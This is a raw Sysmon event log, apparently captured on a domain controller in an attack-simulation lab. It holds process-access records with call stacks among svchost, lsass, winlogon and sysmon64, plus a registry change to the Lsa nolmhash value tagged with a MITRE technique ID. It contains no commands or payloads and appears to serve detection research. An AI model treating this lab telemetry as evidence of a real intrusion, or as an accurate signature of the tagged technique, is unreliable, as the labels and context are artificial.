15:51:44.143{D28789B6-7C64-5FA1-0C00-000000008801}6081124C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002624Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:44.143{D28789B6-7C64-5FA1-0C00-000000008801}6081124C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002623Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:44.143{D28789B6-7C64-5FA1-0C00-000000008801}6081124C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002622Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:44.128{D28789B6-7C64-5FA1-0C00-000000008801}6081124C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002621Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:44.128{D28789B6-7C64-5FA1-0C00-000000008801}6081124C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002620Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:44.128{D28789B6-7C64-5FA1-0C00-000000008801}6081124C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002619Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:44.128{D28789B6-7C64-5FA1-0C00-000000008801}6081124C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002618Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:44.128{D28789B6-7C64-5FA1-0C00-000000008801}6081124C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002617Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:44.128{D28789B6-7C64-5FA1-0C00-000000008801}6081124C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002616Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:44.128{D28789B6-7C64-5FA1-0C00-000000008801}6081124C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002615Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:44.128{D28789B6-7C64-5FA1-0C00-000000008801}6081124C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002614Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:44.128{D28789B6-7C64-5FA1-0C00-000000008801}6081124C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002613Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:44.128{D28789B6-7C64-5FA1-0C00-000000008801}6081124C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-0E00-000000008801}1080C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002612Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:44.128{D28789B6-7C64-5FA1-0C00-000000008801}608920C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002611Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:44.128{D28789B6-7C64-5FA1-0C00-000000008801}608920C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002610Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:44.128{D28789B6-7C64-5FA1-0C00-000000008801}608920C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002609Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:44.128{D28789B6-7C64-5FA1-0C00-000000008801}6084436C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002608Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:44.128{D28789B6-7C64-5FA1-0C00-000000008801}608920C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002607Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:44.128{D28789B6-7C64-5FA1-0C00-000000008801}6084436C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002606Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:44.128{D28789B6-7C64-5FA1-0C00-000000008801}6081124C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0900-000000008801}780C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+396a|c:\windows\system32\SYSNTFY.dll+1fc3|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+52338|C:\Windows\System32\RPCRT4.dll+25357|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002605Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:44.128{D28789B6-7C64-5FA1-0C00-000000008801}6081124C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0900-000000008801}780C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+50b34|C:\Windows\System32\RPCRT4.dll+25cd0|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002604Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:44.128{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002603Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:44.128{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0900-000000008801}780C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+50b34|C:\Windows\System32\RPCRT4.dll+25cd0|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002602Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:44.128{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002601Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:44.128{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000002600Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localT1101SetValue2020-11-03 15:51:44.081{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Control\Lsa\nolmhashDWORD (0x00000001) 